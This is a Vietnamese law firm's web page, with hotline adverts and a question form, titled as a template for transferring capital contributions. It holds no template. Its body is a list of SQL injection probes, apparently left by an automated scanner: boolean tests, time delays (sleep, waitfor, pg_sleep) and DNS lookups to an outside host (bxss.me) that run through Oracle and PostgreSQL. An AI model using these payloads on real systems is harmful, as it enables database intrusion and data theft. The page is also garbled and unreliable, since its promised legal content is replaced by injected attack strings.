Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu hợp đồng chuyển nhượng vốn góp

Cập nhật lần cuối lúc 09:29 ngày 23/04/2014

1
1
1
1'"
1
\
-1 OR 2+257-257-1=0+0+0+1 --
1
-1 OR 3+257-257-1=0+0+0+1 --
-1 OR 3*2<(0+5+257-257) --
@@m0wFj
-1 OR 3*2>(0+5+257-257) --
JyI=
-1 OR 2+666-666-1=0+0+0+1
-1 OR 3+666-666-1=0+0+0+1
-1 OR 3*2<(0+5+666-666)
-1 OR 3*2>(0+5+666-666)
-1' OR 2+226-226-1=0+0+0+1 --
-1' OR 3+226-226-1=0+0+0+1 --
-1' OR 3*2<(0+5+226-226) --
-1' OR 3*2>(0+5+226-226) --
-1' OR 2+204-204-1=0+0+0+1 or 'yttSHGIq'='
-1' OR 3+204-204-1=0+0+0+1 or 'yttSHGIq'='
-1' OR 3*2<(0+5+204-204) or 'yttSHGIq'='
-1' OR 3*2>(0+5+204-204) or 'yttSHGIq'='
-1" OR 2+93-93-1=0+0+0+1 --
-1" OR 3+93-93-1=0+0+0+1 --
-1" OR 3*2<(0+5+93-93) --
-1" OR 3*2>(0+5+93-93) --
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
-1; waitfor delay '0:0:6' --
-1); waitfor delay '0:0:6' --
1 waitfor delay '0:0:9' --
NcocWB02'; waitfor delay '0:0:9' --
-1;select pg_sleep(9); --
-1);select pg_sleep(3); --
-1));select pg_sleep(3); --
tdwMhEG9';select pg_sleep(3); --
0Gj7oVuq');select pg_sleep(3); --
WFPzlG9x');select pg_sleep(9); --
hHNNAfjv'));select pg_sleep(6); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5043.34060.4abf9.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5044.34060.4abf9.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5045.34060.4abf9.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5046.34060.4abf9.\1.bxss.me
225'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: